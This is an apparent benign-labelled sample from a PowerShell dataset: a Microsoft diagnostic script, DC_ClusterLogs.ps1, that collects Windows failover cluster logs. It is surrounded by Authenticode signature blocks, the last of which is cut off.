GBMyMDI0MDQyMzEzMTUyMS4xMDlaMASAAgH0oIHYpIHVMIHSMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl # bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNO # OjNCRDQtNEI4MC02OUMzMSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBT # ZXJ2aWNloIIReDCCBycwggUPoAMCAQICEzMAAAHlj2rA8z20C6MAAQAAAeUwDQYJ # KoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwHhcNMjMx # MDEyMTkwNzM1WhcNMjUwMTEwMTkwNzM1WjCB0jELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxhbmQgT3Bl # cmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjozQkQ0LTRC # ODAtNjlDMzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZTCC # AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAKl74Drau2O6LLrJO3HyTvO9 # aXai//eNyP5MLWZrmUGNOJMPwMI08V9zBfRPNcucreIYSyJHjkMIUGmuh0rPV5/2 # +UCLGrN1P77n9fq/mdzXMN1FzqaPHdKElKneJQ8R6cP4dru2Gymmt1rrGcNe800C # cD6d/Ndoommkd196VqOtjZFA1XWu+GsFBeWHiez/PllqcM/eWntkQMs0lK0zmCfH # +Bu7i1h+FDRR8F7WzUr/7M3jhVdPpAfq2zYCA8ZVLNgEizY+vFmgx+zDuuU/GChD # K7klDcCw+/gVoEuSOl5clQsydWQjJJX7Z2yV+1KC6G1JVqpP3dpKPAP/4udNqpR5 # HIeb8Ta1JfjRUzSv3qSje5y9RYT/AjWNYQ7gsezuDWM/8cZ11kco1JvUyOQ8x/JD # kMFqSRwj1v+mc6LKKlj//dWCG/Hw9ppdlWJX6psDesQuQR7FV7eCqV/lfajoLpPN # x/9zF1dv8yXBdzmWJPeCie2XaQnrAKDqlG3zXux9tNQmz2L96TdxnIO2OGmYxBAA # ZAWoKbmtYI+Ciz4CYyO0Fm5Z3T40a5d7KJuftF6CToccc/Up/jpFfQitLfjd71cS # +cLCeoQ+q0n0IALvV+acbENouSOrjv/QtY4FIjHlI5zdJzJnGskVJ5ozhji0YRsc # v1WwJFAuyyCMQvLdmPddAgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQU3/+fh7tNczEi # fEXlCQgFOXgMh6owHwYDVR0jBBgwFoAUn6cVXQBeYl2D9OXSZacbUzUZ6XIwXwYD # VR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9j # cmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3JsMGwG # CCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIw # MjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUBAf8EDDAKBggrBgEFBQcD # CDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBADP6whOFjD1ad8Gk # EJ9oLBuvfjndMyGQ9R4HgBKSlPt3pa0XVLcimrJlDnKGgFBiWwI6XOgw82hdolDi # MDBLLWRMTJHWVeUY1gU4XB8OOIxBc9/Q83zb1c0RWEupgC48I+b+2x2VNgGJUsQI # yPR2PiXQhT5PyerMgag9OSodQjFwpNdGirna2rpV23EUwFeO5+3oSX4JeCNZvgyU # OzKpyMvqVaubo+Glf/psfW5tIcMjZVt0elswfq0qJNQgoYipbaTvv7xmixUJGTbi # xYifTwAivPcKNdeisZmtts7OHbAM795ZvKLSEqXiRUjDYZyeHyAysMEALbIhdXgH # Eh60KoZyzlBXz3VxEirE7nhucNwM2tViOlwI7EkeU5hudctnXCG55JuMw/wb7c71 # RKimZA/KXlWpmBvkJkB0BZES8OCGDd+zY/T9BnTp8si36Tql84VfpYe9iHmy7Pqq # xqMF2Cn4q2a0mEMnpBruDGE/gR9c8SVJ2ntkARy5SfluuJ/MB61yRvT1mUx3lypp # O22ePjBjnwoEvVxbDjT1jhdMNdevOuDeJGzRLK9HNmTDC+TdZQlj+VMgIm8ZeEIR # NF0oaviF+QZcUZLWzWbYq6yDok8EZKFiRR5otBoGLvaYFpxBZUE8mnLKuDlYobjr # xh7lnwrxV/fMy0F9fSo2JxFmtLgtMIIHcTCCBVmgAwIBAgITMwAAABXF52ueAptJ # mQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgT # Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m # dCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNh # dGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1 # WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCCAiIwDQYJKoZIhvcNAQEB # BQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjK # NVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWNE893MsAQGOhg # fWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t1w/YJlN8OWECesSq/XJp # rx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W7IVWTe/d # vI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmPfrVUj9z6BVWYbWg7mka9 # 7aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De+JKR # Hh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv231fgLrbqn427DZM9itu # qBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyO # ArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYctenIPDC+hIK12NvDMk2ZItb # oKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6 # bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17aj54WcmnGrnu3tz5q4i6t # AgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQW # BBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBeYl2D9OXSZacb # UzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEwQTA/BggrBgEFBQcCARYz # aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9zaXRvcnku # aHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQBgjcUAgQMHgoAUwB1AGIA # QwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNX2 # VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9jcmwu # bWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEw # LTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6Ly93 # d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYt # MjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3hLB9nATEkW+Geckv8qW/q # XBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6 # U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74py27YP0h1AdkY3m2CDPVt # I1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1AoL8ZthISEV09J+BAljis # 9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tuPywJeBTp # kbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB9s7GdP32THJvEKt1MMU0 # sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz138e # W0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3rsjoiV5PndLQTHa1V1QJ # sWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7 # Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A245oyZ1uEi6vAnQj0llOZ0 # dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQ # tB1VM1izoXBm8qGCAtQwggI9AgEBMIIBAKGB2KSB1TCB0jELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxh # bmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjoz # QkQ0LTRCODAtNjlDMzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2Vy # dmljZaIjCgEBMAcGBSsOAwIaAxUA942iGuYFrsE4wzWDd85EpM6RiwqggYMwgYCk # fjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQUFAAIF # AOnRkLkwIhgPMjAyNDA0MjMwOTQzMjFaGA8yMDI0MDQyNDA5NDMyMVowdDA6Bgor # BgEEAYRZCgQBMSwwKjAKAgUA6dGQuQIBADAHAgEAAgIS7DAHAgEAAgISrzAKAgUA # 6dLiOQIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAowCAIBAAID # B6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GBADCABKpo/NApeGAt90g9 # 7xtu4+UUum7D2dW9CKtCaWLoBQ1sTWXvbYjO+iDNeX2fGPvThUiQemQ8jwI/aA1i # 5hFilJpWq+pj8v1VBfyrL2Z+NQxc5bsPHJW6zhwZTP60f1cT69nPDTDg+i6ONCMm # CZpEKIFnpxesMgA/SemL/sFIMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUt # U3RhbXAgUENBIDIwMTACEzMAAAHlj2rA8z20C6MAAQAAAeUwDQYJYIZIAWUDBAIB # BQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQx # IgQgUf7JtVcm54MYFqImSEezQig3VxhrkofFJkKfkmj+Ua0wgfoGCyqGSIb3DQEJ # EAIvMYHqMIHnMIHkMIG9BCAVqdP//qjxGFhe2YboEXeb8I/pAof01CwhbxUH9U69 # 7TCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw # DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x # JjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB5Y9q # wPM9tAujAAEAAAHlMCIEILwRS7dQSUkcQip1beg3JNawncfq1eDXUwS6ExT0PRgi # MA0GCSqGSIb3DQEBCwUABIICAF+7kX52kRyXiOtq09YMD92kq37W32VKG/vF3iZe # Aj8OMVyYWVxTHZ3kUE3VUOVQJs2h22cwYQvfgoJfH3ZzCliEiy9WNhVQv/J+oT4c # cuQQDRICV3e/YhoxBdkVxuJ9QEFmcg6jxZHJaM9om6rMBHJD0U4YtTUPtda7ik9x # Y1XEv0ycDhqic9nVvRWBKrxOvd3ZZLrMLmgzMt1rkJVpT2C1Z1r+F6wBRZX+uYJI # omo01BSdUs/MnX23a0ZYUb7XenUMGnHuiU1YCZiUfYC5PzDoJX5iI9b6UY6hQ0Nh # ajPcz7uxQKDqjem4s61kqyrKsTJVXbnZYMN205ccd746tcy579I3tLt/8bYt+YEi # GVPlt7xPfisoLDJw3KRzvSimiXxShusiKWO6OBww5IxuN8xUokkku1rwsdNMhXul # U4o39rrTabdR4BR08S22yWnM/agtgYzbEHLmh2Xg+VDS+cIVzfj/d6joc1T7fcKq # MrBa6zkQGmxhKBzX7fIq27Nqp+NdGlat7R75VSpAHN4CPjSae8s8znb9NiqdmIqR # s9XDfttazW1WQSfrXxoIQXtUpcpkg8yOLeN3RWpt7ZfYrw2RdHFx4aMlYa2l+/R/ # 2MEfIced6wI9UgS+MUDZ8pZ6hItT8+MtvenD+i3WGdxPdYNg3XBHqf6QAIBAxpXj # XvxF # SIG # End signature block
combined_dataset/train/non-malicious/sample_18_98.ps1
sample_18_98.ps1
#************************************************ # DC_ClusterLogs.PS1 # Version 2.3.5 # Date: 02-09-2012 # Author: Andre Teixeira - andret@microsoft.com # Description: This script is used to obtain cluster logs from both nodes (Windows Server 2008 R2) or from the local machine (pre-2K8R2) #************************************************ PARAM([switch] $LocalOnly) # 2023-02-20 WalterE mod Trap #we# trap [Exception]{ WriteTo-StdOut "$($_.InvocationInfo.ScriptName)($($_.InvocationInfo.ScriptLineNumber)): $_" -shortformat; continue Write-Host "$($_.InvocationInfo.ScriptName)($($_.InvocationInfo.ScriptLineNumber)): $_" } if($debug -eq $true){[void]$shell.popup("Run DC_ClusterLogs.ps1")} Import-LocalizedData -BindingVariable ClusterLogsStrings $ClusterServiceKey="HKLM:\Cluster" if (Test-Path $ClusterServiceKey) { Write-DiagProgress -activity $ClusterLogsStrings.ID_ClusterLogsOutputDesc -status $ClusterLogsStrings.ID_ClusterLogsObtaining $sectionDescription = "Cluster Logs" #Windows Server 2008 R2 if ($OSVersion.Build -gt 7000) { if (((Get-Service "clussvc").Status) -eq "Running") { Import-Module FailoverClusters "Generating Cluster Log to " + ($pwd.Path) | WriteTo-StdOut -ShortFormat if ($LocalOnly.IsPresent) { $ClusterLogFileNames = Get-ClusterLog -Destination ($pwd.Path) -Node $ComputerName } else { $ClusterLogFileNames = Get-ClusterLog -Destination ($pwd.Path) } ForEach ($ClusterLogFileName in $ClusterLogFileNames) { [String] $ClusterLogFileNameString = $ClusterLogFileName.BaseName $fileDescription = $ClusterLogFileNameString.Substring(0, $ClusterLogFileNameString.Length - 8) if (($fileDescription -eq "$ComputerName") -and (-not $LocalOnly.IsPresent)) {$fileDescription += "*"} $filesToCollect = $ClusterLogFileName.FullName CollectFiles -filesToCollect $filesToCollect -fileDescription $fileDescription -sectionDescription $sectionDescription } } else { "Error: Cluster Service is not running. No cluster log was generated" | WriteTo-StdOut -ShortFormat -IsError } } #Windows Server 2008 elseif ($OSVersion.Build -gt 6000) { $fileDescription = "Cluster Log" #$filesToCollect = Join-Path $Env:windir "cluster\Reports\cluster.log" $filesToCollect = Join-Path $pwd.Path "*_cluster.log" $CommandToRun = "cluster.exe log /g /node:$Computername /copy:`"" + $PWD.Path + "`"" RunCMD -commandToRun $CommandToRun -fileDescription $fileDescription -sectionDescription $sectionDescription -filesToCollect $filesToCollect -BackgroundExecution #CollectFiles -filesToCollect $filesToCollect -fileDescription $fileDescription -sectionDescription $sectionDescription -renameOutput $true } #Windows Server 2003 else { $fileDescription = "Cluster Log" $filesToCollect = Join-Path $Env:windir "cluster\cluster.log" CollectFiles -filesToCollect $filesToCollect -fileDescription $fileDescription -sectionDescription $sectionDescription -renameOutput $true } } # SIG # Begin signature block # MIIoRgYJKoZIhvcNAQcCoIIoNzCCKDMCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCBOFG4aq/vVKYXI # 0nvIIbLHSoQJDBR/xAQL+KTHfIjjT6CCDXYwggX0MIID3KADAgECAhMzAAAEBGx0 # Bv9XKydyAAAAAAQEMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTE0WhcNMjUwOTExMjAxMTE0WjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQC0KDfaY50MDqsEGdlIzDHBd6CqIMRQWW9Af1LHDDTuFjfDsvna0nEuDSYJmNyz # NB10jpbg0lhvkT1AzfX2TLITSXwS8D+mBzGCWMM/wTpciWBV/pbjSazbzoKvRrNo # DV/u9omOM2Eawyo5JJJdNkM2d8qzkQ0bRuRd4HarmGunSouyb9NY7egWN5E5lUc3 # a2AROzAdHdYpObpCOdeAY2P5XqtJkk79aROpzw16wCjdSn8qMzCBzR7rvH2WVkvF # HLIxZQET1yhPb6lRmpgBQNnzidHV2Ocxjc8wNiIDzgbDkmlx54QPfw7RwQi8p1fy # 4byhBrTjv568x8NGv3gwb0RbAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU8huhNbETDU+ZWllL4DNMPCijEU4w # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMjkyMzAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAIjmD9IpQVvfB1QehvpC # Ge7QeTQkKQ7j3bmDMjwSqFL4ri6ae9IFTdpywn5smmtSIyKYDn3/nHtaEn0X1NBj # L5oP0BjAy1sqxD+uy35B+V8wv5GrxhMDJP8l2QjLtH/UglSTIhLqyt8bUAqVfyfp # h4COMRvwwjTvChtCnUXXACuCXYHWalOoc0OU2oGN+mPJIJJxaNQc1sjBsMbGIWv3 # cmgSHkCEmrMv7yaidpePt6V+yPMik+eXw3IfZ5eNOiNgL1rZzgSJfTnvUqiaEQ0X # dG1HbkDv9fv6CTq6m4Ty3IzLiwGSXYxRIXTxT4TYs5VxHy2uFjFXWVSL0J2ARTYL # E4Oyl1wXDF1PX4bxg1yDMfKPHcE1Ijic5lx1KdK1SkaEJdto4hd++05J9Bf9TAmi # u6EK6C9Oe5vRadroJCK26uCUI4zIjL/qG7mswW+qT0CW0gnR9JHkXCWNbo8ccMk1 # sJatmRoSAifbgzaYbUz8+lv+IXy5GFuAmLnNbGjacB3IMGpa+lbFgih57/fIhamq # 5VhxgaEmn/UjWyr+cPiAFWuTVIpfsOjbEAww75wURNM1Imp9NJKye1O24EspEHmb # DmqCUcq7NqkOKIG4PVm3hDDED/WQpzJDkvu4FrIbvyTGVU01vKsg4UfcdiZ0fQ+/ # V0hf8yrtq9CkB8iIuk5bBxuPMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGiYwghoiAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAQEbHQG/1crJ3IAAAAABAQwDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIICsZJAeJGSro6CHhuhFZXOE # kTYxbhkRmGr74gKdRAgeMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEAhBp94B8yxKL/QN0GfxhzZLMHlVMkyskbSwdGzhCcEl17A8S4ngKQ2s7F # V/ZEYBFIXqbVme+mo+SiSNxDsMX5zLcw6E07jnMPb96ikn5um2m+aIHzM21ym20L # h/8BNe0To8lreaGMuE4N2gF79euGBxOfXUW+G79IV0duIJxOj5Bwr8nrij+Ni4fj # ko+yBgqLTpIPr/b1jftTLcMoSEr0OOIx4AumSJCVEsK1OtT3vHYwqYQ5OkDAulp/ # uykSM5e7eVStv0EkCuliIJ5GJ9+5bBMERsxUSmSBVY4PVL6YfAqBGtJrot8b8FTL # GT4ET0ofFrj8hTXKbAbaZJJ0BQ3v4qGCF7AwghesBgorBgEEAYI3AwMBMYIXnDCC # F5gGCSqGSIb3DQEHAqCCF4kwgheFAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFaBgsq # hkiG9w0BCRABBKCCAUkEggFFMIIBQQIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCAXT8G0usyZWFJ+KWjOuak/iUtylOSDElvHx5vyd/7zGAIGZuto66KE # GBMyMDI0MTAyODExNDA0NC4wODFaMASAAgH0oIHZpIHWMIHTMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl # bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsTHm5TaGllbGQgVFNTIEVT # 